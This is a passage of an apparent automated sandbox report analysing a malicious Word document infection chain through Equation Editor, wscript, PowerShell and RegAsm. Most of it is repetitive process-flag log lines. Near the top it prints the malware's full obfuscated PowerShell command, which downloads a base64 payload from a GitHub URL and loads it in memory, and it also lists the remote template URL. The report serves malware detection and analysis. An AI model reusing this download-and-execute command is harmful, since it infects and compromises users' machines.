dGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041CBE1
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_005D1A18 push eax; retf 8_2_005D1A19
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00457186 push ecx; ret 14_2_00457199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0045E55D push esi; ret 14_2_0045E566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00457AA8 push eax; ret 14_2_00457AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434EB6 push ecx; ret 14_2_00434EC9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10002806 push ecx; ret 14_2_10002819
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044693D push ecx; ret 15_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044DB70 push eax; ret 15_2_0044DB84
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044DB70 push eax; ret 15_2_0044DBAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00451D54 push eax; ret 15_2_00451D61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00451D34 push eax; ret 16_2_00451D41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00444E71 push ecx; ret 16_2_00444E81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00414060 push eax; ret 18_2_00414074
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00414060 push eax; ret 18_2_0041409C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00414039 push ecx; ret 18_2_00414049
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004164EB push 0000006Ah; retf 18_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00416553 push 0000006Ah; retf 18_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00416555 push 0000006Ah; retf 18_2_004165C4

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\og1.in@SSL\DavWWWRootJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\og1.in@SSL\DavWWWRootJump to behavior
                  Source: settings.xml.relsExtracted files from sample: https://og1.in/s7uyq0
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever[1].doc.0.drJump to dropped file
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: 4471D5D4.doc.0.drJump to dropped file
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00406EEB ShellExecuteW,URLDownloadToFileW,14_2_00406EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,14_2_0041AADB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041CBE1
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
